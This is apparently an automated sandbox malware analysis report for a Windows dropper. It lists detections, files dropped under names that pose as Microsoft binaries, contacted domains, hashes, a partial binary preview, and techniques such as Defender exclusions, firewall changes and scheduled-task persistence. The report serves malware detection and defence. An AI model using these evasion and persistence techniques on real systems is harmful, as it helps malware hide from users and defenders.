  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545319 Sample: SecuriteInfo.com.Win32.Drop... Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 77 nt89s.kro.kr 2->77 79 nt89.kro.kr 2->79 83 Antivirus detection for dropped file 2->83 85 Antivirus / Scanner detection for submitted sample 2->85 87 Multi AV Scanner detection for dropped file 2->87 89 9 other signatures 2->89 9 SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe 8 2->9         started        signatures3 process4 file5 69 C:\ProgramData\...\MicrosoftEdgeUpdate.exe, PE32 9->69 dropped 71 C:\ProgramData\Microsoft\...\iexplore.exe, PE32 9->71 dropped 73 C:\ProgramData\Microsoft\Bound.exe, PE32 9->73 dropped 75 SecuriteInfo.com.W....24481.7673.exe.log, CSV 9->75 dropped 91 Detected unpacking (changes PE section rights) 9->91 93 Bypasses PowerShell execution policy 9->93 95 Adds a directory exclusion to Windows Defender 9->95 97 Drops executable to a common third party application directory 9->97 13 MicrosoftEdgeUpdate.exe 1 9->13         started        16 Bound.exe 3 9->16         started        18 cmd.exe 1 9->18         started        20 4 other processes 9->20 signatures6 process7 signatures8 101 Multi AV Scanner detection for dropped file 13->101 22 iexplore.exe 101 13->22         started        25 WerFault.exe 19 16 13->25         started        103 Antivirus detection for dropped file 16->103 105 Machine Learning detection for dropped file 16->105 107 Modifies the windows firewall 16->107 27 cmd.exe 16->27         started        30 powershell.exe 7 16->30         started        32 powershell.exe 16->32         started        36 2 other processes 16->36 109 Uses ping.exe to sleep 18->109 111 Uses schtasks.exe or at.exe to add and modify task schedules 18->111 113 Uses ping.exe to check the status of other devices and networks 18->113 38 2 other processes 18->38 115 Uses netsh to modify the Windows network and firewall settings 20->115 117 Loading BitLocker PowerShell Module 20->117 34 WmiPrvSE.exe 20->34         started        40 4 other processes 20->40 process9 file10 61 C:\Users\user\AppData\...\unicodedata.pyd, PE32 22->61 dropped 63 C:\Users\user\AppData\Local\...\select.pyd, PE32 22->63 dropped 65 C:\Users\user\AppData\Local\...\python37.dll, PE32 22->65 dropped 67 73 other files (30 malicious) 22->67 dropped 42 conhost.exe 22->42         started        44 iexplore.exe 22->44         started        99 Uses ping.exe to sleep 27->99 46 PING.EXE 27->46         started        49 conhost.exe 27->49         started        51 conhost.exe 30->51         started        53 netsh.exe 30->53         started        55 conhost.exe 32->55         started        57 netsh.exe 32->57         started        59 4 other processes 36->59 signatures11 process12 dnsIp13 81 127.0.0.1 unknown unknown 46->81

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe62%ReversingLabsWin32.Trojan.Leonem
SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe100%AviraHEUR/AGEN.1352253
SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe100%AviraTR/AVI.Agent.rrfxm
C:\ProgramData\Microsoft\Bound.exe100%AviraTR/AVI.Agent.lvnlf
C:\ProgramData\Microsoft\Bound.exe100%Joe Sandbox ML
C:\ProgramData\Microsoft\Bound.exe62%ReversingLabsWin32.Trojan.Znyonm
C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe58%ReversingLabsWin32.Trojan.Clyp
C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe42%ReversingLabsWin32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\_MEI55002\VCRUNTIME140.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\_bz2.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\_ctypes.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\_elementtree.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\_hashlib.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\_lzma.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\_socket.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\_ssl.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-synch-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-synch-l1-2-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-sysinfo-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-timezone-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-util-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-conio-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-convert-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-environment-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-filesystem-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-heap-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-locale-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-math-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-process-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-runtime-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-stdio-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-string-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-time-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-utility-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\cv2.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\mat_wrapper\__init__.py0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\misc\__init__.py0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\opencv_videoio_ffmpeg480.dll4%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\utils\__init__.py0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\libcrypto-1_1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\libopenblas.VTYUM5MXKVFE4PZZER3L7PNO6YB4XFF3.gfortran-win32.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\libssl-1_1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\netifaces.cp37-win32.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\core\_multiarray_tests.cp37-win32.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\core\_multiarray_umath.cp37-win32.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\fft\_pocketfft_internal.cp37-win32.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\linalg\_umath_linalg.cp37-win32.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\linalg\lapack_lite.cp37-win32.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_bounded_integers.cp37-win32.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_common.cp37-win32.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_generator.cp37-win32.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_mt19937.cp37-win32.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_pcg64.cp37-win32.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_philox.cp37-win32.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_sfc64.cp37-win32.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\bit_generator.cp37-win32.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\mtrand.cp37-win32.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\psutil\_psutil_windows.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\pyexpat.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\python3.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\python37.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\select.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\ucrtbase.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI55002\unicodedata.pyd0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://contoso.com/License0%URL Reputationsafe
http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
http://ocsp.thawte.com00%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://upx.sf.net0%URL Reputationsafe
http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://crl.v0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
nt89.kro.kr
unknown
unknownfalse
    		unknown
    nt89s.kro.kr
    		unknown
    		unknownfalse
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://onnx.ai/)cv2.pyd.15.drfalse
        		unknown
        http://caffe.berkeleyvision.org/)cv2.pyd.15.drfalse
          		unknown
          https://github.com/opencv/opencv/issues/23152.cv2.pyd.15.drfalse
            		unknown
            https://www.learnopencv.com/convex-hull-using-opencv-in-python-and-c/nativeVectorWidthIntdecode(imgcv2.pyd.15.drfalse
              		unknown
              http://torch.ch/)cv2.pyd.15.drfalse
                		unknown
                https://contoso.com/Licensepowershell.exe, 00000002.00000002.1897044803.000002083316F000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.dai.ed.ac.uk/CVonline/LOCAL_COPIES/MANDUCHI1/Bilateral_Filtering.htmlcv2.pyd.15.drfalse
                  		unknown
                  https://gist.github.com/imneme/540829265469e673d045bit_generator.cp37-win32.pyd.15.drfalse
                    		unknown
                    http://www.math.sfu.ca/~cbm/aands/page_69.htm_multiarray_umath.cp37-win32.pyd.15.drfalse
                      		unknown
                      https://github.com/opencv/opencv/issues/6293cv2.pyd.15.drfalse
                        		unknown
                        https://github.com/opencv/opencv/issues/16739cv2.pyd.15.drfalse
                          		unknown
                          https://www.tensorflow.org/cv2.pyd.15.drfalse
                            		unknown
                            https://static.aminer.org/pdf/PDF/000/317/196/spatio_temporal_wiener_filtering_of_image_sequences_uscv2.pyd.15.drfalse
                              		unknown
                              https://github.com/openvinotoolkit/open_model_zoo/blob/master/models/public/yolo-v2-tiny-tf/yolo-v2-cv2.pyd.15.drfalse
                                		unknown
                                http://www.pcg-random.org/posts/random-invertible-mapping-statistics.html_sfc64.cp37-win32.pyd.15.drfalse
                                  		unknown
                                  https://numpy.org/doc/stable/user/basics.subclassing.html__init__.py4.15.drfalse
                                    		unknown
                                    http://pracrand.sourceforge.net/RNG_engines.txt_sfc64.cp37-win32.pyd.15.drfalse
                                      		unknown
                                      https://github.com/torch/nn/blob/master/doc/module.mdcv2.pyd.15.drfalse
                                        		unknown
                                        http://crl.thawte.com/ThawteTimestampingCA.crl0select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, python37.dll.15.dr, _ctypes.pyd.15.dr, _elementtree.pyd.15.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://contoso.com/powershell.exe, 00000002.00000002.1897044803.000002083316F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1897044803.000002083316F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://pjreddie.com/darknet/)cv2.pyd.15.drfalse
                                          		unknown
                                          http://torch.chcv2.pyd.15.drfalse
                                            		unknown
                                            https://www.tensorflow.org/litecv2.pyd.15.drfalse
                                              		unknown
                                              http://www.gdal.org/ogr_formats.html).cv2.pyd.15.drfalse
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1839674107.0000020823101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1999026288.00000274535BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2075247518.000001D613313000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2162722138.0000019EC62B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2273918965.000001FBD8E07000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.ipol.im/pub/algo/bcm_non_local_means_denoisingcv2.pyd.15.drfalse
                                                  		unknown
                                                  https://www.tensorflow.org/)cv2.pyd.15.drfalse
                                                    		unknown
                                                    http://python.org/dev/peps/pep-0263/python37.dll.15.drfalse
                                                      		unknown
                                                      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1897044803.000002083316F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://github.com/opencv/opencv/issues/16739cv::MatOp_AddEx::assign4gcv2.pyd.15.drfalse
                                                        		unknown
                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1839674107.0000020823329000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.1839674107.0000020823329000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1839674107.0000020823329000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://www.math.sfu.ca/~cbm/aands/_multiarray_umath.cp37-win32.pyd.15.drfalse
                                                            		unknown
                                                            https://github.com/opencv/opencv/issues/6293u-cv2.pyd.15.drfalse
                                                              		unknown
                                                              http://ocsp.thawte.com0select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, python37.dll.15.dr, _ctypes.pyd.15.dr, _elementtree.pyd.15.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://contoso.com/Iconpowershell.exe, 00000002.00000002.1897044803.000002083316F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://upx.sf.netAmcache.hve.22.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.pcg-random.org/posts/developing-a-seed_seq-alternative.htmlbit_generator.cp37-win32.pyd.15.drfalse
                                                                		unknown
                                                                https://arxiv.org/abs/1704.04503cv2.pyd.15.drfalse
                                                                  		unknown
                                                                  http://campar.in.tum.de/Chair/HandEyeCalibration).cv2.pyd.15.drfalse
                                                                    		unknown
                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1839674107.0000020823329000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://www.ipol.im/pub/algo/bcm_non_local_means_denoising/cv2.pyd.15.drfalse
                                                                        		unknown
                                                                        http://www.gdal.org/formats_list.html)cv2.pyd.15.drfalse
                                                                          		unknown
                                                                          https://www.learnopencv.com/convex-hull-using-opencv-in-python-and-c/cv2.pyd.15.drfalse
                                                                            		unknown
                                                                            http://www.gdal.org)cv2.pyd.15.drfalse
                                                                              		unknown
                                                                              http://homepages.inf.ed.ac.uk/rbf/HIPR2/hough.htmcv2.pyd.15.drfalse
                                                                                		unknown
                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.1839674107.0000020823329000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://github.com/NVIDIA/caffe.cv2.pyd.15.drfalse
                                                                                  		unknown
                                                                                  https://github.com/opencv/opencv/issues/5412.cv2.pyd.15.drfalse
                                                                                    		unknown
                                                                                    https://onnx.ai/cv2.pyd.15.drfalse
                                                                                      		unknown
                                                                                      https://software.intel.com/openvino-toolkit)cv2.pyd.15.drfalse
                                                                                        		unknown
                                                                                        http://underdestruction.com/2004/02/25/stackblur-2004.cv2.pyd.15.drfalse
                                                                                          		unknown
                                                                                          http://caffe.berkeleyvision.orgcv2.pyd.15.drfalse
                                                                                            		unknown
                                                                                            https://aka.ms/pscore68powershell.exe, 00000002.00000002.1839674107.0000020823101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1999026288.000002745359C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1999026288.000002745356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2075247518.000001D61334D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2075247518.000001D613339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2162722138.0000019EC628D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2162722138.0000019EC6270000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2273918965.000001FBD8DDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2273918965.000001FBD8DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://crl.vpowershell.exe, 0000001E.00000002.2218905322.0000019EDE230000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://pjreddie.com/darknet/cv2.pyd.15.drfalse
                                                                                              		unknown

                                                                                              World Map of Contacted IPs

                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs

                                                                                              Public IPs

                                                                                              IPDomainCountryFlagASNASN NameMalicious

                                                                                              Private

                                                                                              IP
                                                                                              127.0.0.1

                                                                                              General Information

                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                              Analysis ID:1545319
                                                                                              Start date and time:2024-10-30 12:24:14 +01:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 9m 4s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Number of analysed new started processes analysed:40
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:0
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Sample name:SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe
                                                                                              Detection:MAL
                                                                                              Classification:mal100.troj.evad.winEXE@55/112@18/1
                                                                                              EGA Information:Failed
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 97%
                                                                                              • Number of executed functions: 27
                                                                                              • Number of non-executed functions: 0
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .exe

                                                                                              Warnings

                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 20.189.173.20
                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                              • Execution Graph export aborted for target Bound.exe, PID 5180 because it is empty
                                                                                              • Execution Graph export aborted for target MicrosoftEdgeUpdate.exe, PID 280 because it is empty
                                                                                              • Execution Graph export aborted for target powershell.exe, PID 4308 because it is empty
                                                                                              • Execution Graph export aborted for target powershell.exe, PID 5900 because it is empty
                                                                                              • Execution Graph export aborted for target powershell.exe, PID 6176 because it is empty
                                                                                              • Execution Graph export aborted for target powershell.exe, PID 6376 because it is empty
                                                                                              • Execution Graph export aborted for target powershell.exe, PID 736 because it is empty
                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                              • Report size getting too big, too many NtReadFile calls found.
                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                              • VT rate limit hit for: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe

                                                                                              Simulations

                                                                                              Behavior and APIs

                                                                                              TimeTypeDescription
                                                                                              07:25:19API Interceptor17x Sleep call for process: powershell.exe modified
                                                                                              07:25:55API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                              11:25:30Task SchedulerRun new task: MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAB-BD9C-FC4F0859F018} path: "C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe"

                                                                                              Joe Sandbox View / Context

                                                                                              IPs

                                                                                              No context

                                                                                              Domains

                                                                                              No context

                                                                                              ASNs

                                                                                              No context

                                                                                              JA3 Fingerprints

                                                                                              No context

                                                                                              Dropped Files

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              C:\Users\user\AppData\Local\Temp\_MEI55002\VCRUNTIME140.dllhttps://vendor-agreement.s3.amazonaws.com/folder4/doc-11te68fpfa.htmlGet hashmaliciousUnknownBrowse
                                                                                                201721443921282.exeGet hashmaliciousUnknownBrowse
                                                                                                  201721443921282.exeGet hashmaliciousUnknownBrowse
                                                                                                    201721443921282.exeGet hashmaliciousUnknownBrowse
                                                                                                      201721443921282.exeGet hashmaliciousUnknownBrowse
                                                                                                        TwoToneDetect73.zipGet hashmaliciousUnknownBrowse
                                                                                                          SecuriteInfo.com.Trojan.Win32.Agent.xbkxiv.21474.22109.exeGet hashmaliciousUnknownBrowse
                                                                                                            dropped.exeGet hashmaliciousUnknownBrowse
                                                                                                              248786461py.exeGet hashmaliciousUnknownBrowse
                                                                                                                0801-1.exeGet hashmaliciousGhostRatBrowse

                                                                                                                  Created / dropped Files

                                                                                                                  C:\ProgramData\Microsoft\Bound.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):7168
                                                                                                                  Entropy (8bit):4.318061163857967
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:MrD9h+GbV52B8tL9WrH72CRWfdvB3AqvTCVKIHVbIxqCN9p:QD91bVEB8p9ibVVnHV0xnN
                                                                                                                  MD5:A1F8A5C21AFC60D046C9075E41BB36A4
                                                                                                                  SHA1:E8C89980BDD3E6FF4E513A6CD6F0B9A3324976A6
                                                                                                                  SHA-256:911ECFCE427A97D8DC5F56BCA9D4FA1C20F4EA7410D1BF0F17F002E02859B645
                                                                                                                  SHA-512:ACC394EEDE4492022CDB9F4B5A446E1624B1437E81457B4EF270393D5DFC4F4D7C7BCAE748C536285B79EAB20304DFCF20F6BD2CE041C1BA25BAC725465AA72E
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L5............"...0..............0... ...@....@.. ....................................`.................................z0..O....@..|....................`......./..8............................................ ............... ..H............text........ ...................... ..`.rsrc...|....@......................@..@.reloc.......`......................@..B.................0......H........"..<............................................................0...........r...p.rq..p.r...p(....(.....r...p.r...p(....(.....r}..p.......%.r...p.%...%.r...p.%...%.rS..p.(....(...........%.r...p.%...%.r...p.%...%.rS..p.(....(.....r...p(.....(.....*....0...........s......rM..po......rk..p.r...p(....o.......o.......o.......o.......o......(.......o....o......o....o......o......(...........,...(.......(...........,..r...p.(....(..........,..o .....*........Q.]........0..

                                                                                                                  C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe
                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):42244190
                                                                                                                  Entropy (8bit):7.996193165891717
                                                                                                                  Encrypted:true
                                                                                                                  SSDEEP:786432:D4D6+v+Py3QQp2Qp5WmECxFUR2JmyiS+hzrZWa41xs6b64G71DaosUe3:Du6+WPyQZQpAmeKarZWa41xFb6V71pbu
                                                                                                                  MD5:9B4B06703C314B8BD494570F443A74AE
                                                                                                                  SHA1:62C8F8D72483DE243E616C4B79990AE12C863415
                                                                                                                  SHA-256:7E29899F0DEFD73C0E89C8EB14CB736E7199165293721910DBC2426D13F3BF47
